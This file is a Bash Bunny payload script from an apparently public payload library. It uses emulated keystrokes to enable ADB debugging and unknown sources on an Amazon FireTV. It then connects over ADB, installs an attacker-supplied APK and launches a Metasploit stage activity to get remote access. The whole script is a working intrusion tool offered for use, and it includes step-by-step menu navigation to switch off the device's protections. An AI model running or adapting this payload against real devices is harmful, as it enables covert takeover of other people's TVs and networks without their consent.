Files
bashbunny-payloads/payloads/library/android/fireytv/payload.txt
2019-07-05 05:14:10 +00:00

81 lines
1.4 KiB
Plaintext

# Title: Firey TV
# Author: DemmSec
# Version: 1.0
# Description:
# Enables ADB and unknown sources on a target FireTV, Then pushes a payload APK via ADB.
# Requires android-tools-adb installed on the Bash Bunny
#
# LEDS:
# Purple: Running HID emulation, enabling ADB and unknown sources
# Blue Blinking: Running ADB command to push payload.apk
# Red Blinking: FireTV failed to get an IP address from the Bash Bunny
# Green: Finished
#
# Target: Android (4.4.2)
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH